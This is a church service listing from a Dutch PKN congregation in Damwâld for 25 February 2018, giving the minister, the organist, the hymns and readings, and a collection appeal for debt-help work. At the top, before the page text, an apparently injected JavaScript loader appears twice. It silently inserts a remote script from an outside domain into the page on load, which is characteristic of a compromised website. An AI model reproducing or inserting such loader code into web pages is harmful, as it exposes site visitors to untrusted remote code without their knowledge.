;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 25 februari 2018 14:00 uur - PKN Damwâld
zondag 25 februari 2018
14:00 uur
Tweede zondag 40-dagentijd

Kerkdienst zondag 25 februari 2018 14:00 uur

Informatie

Voorganger:Ds. C. Hoek, Bedum
Organist:Jelte Cuperus
Mededeling:Tweede zondag 40-dagentijd
Liturgie
Lied voor de dienst ELB 223: 1 en 3
Welkom en mededelingen
Aanvangslied: ELB 241: 1 en 2
Stil gebed , Votum en Groet
We zingen: Psalm 95: 3
Geloofsbelijdenis .
We zingen: Psalm 68: 7
Gebed voor opening Gods woord
We lezen: Matth. 16: 24 - 17: 13
We zingen: Gez. 182: 1 en 4
Verkondiging Matth. 17: 1 - 8
We zingen: ELB 371: 1, 2, 3 en 4
Dankgebed
Collecte
Slotlied Psalm 121: 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: 40-Dagentijd: Uit de schulden -SchuldHulpMaatje

Steeds meer mensen in Nederland hebben tijdelijk of blijvend schulden. Alleenstaande moeders zijn extra kwetsbaar. "Ik heb geen gat in m'n hand, maar moet alles in m'n eentje regelen. Door een fout met de kinderopvangtoeslag kwam ik in de schulden. Ik durfde de post niet meer open te maken. Gelukkig heb ik nu een maatje dat mij helpt", vertelt een moeder uit Amsterdam. Kerk in Actie nam met andere kerken en Christelijke organisaties het initiatief voor het project SchuldHulpMaatjes. Kerk in Actie zet de collecteopbrengst in om nog meer plaatselijke gemeenten te stimuleren een schulphulpmaatjesproject te starten en zo de opdracht van God tot het dienen van hun naaste in nood op actuele wijze vorm te geven, zodat mensen weer schuldenvrij kunnen leven.

Tweede collecte: Kerk
Uitganscollecte: Kerk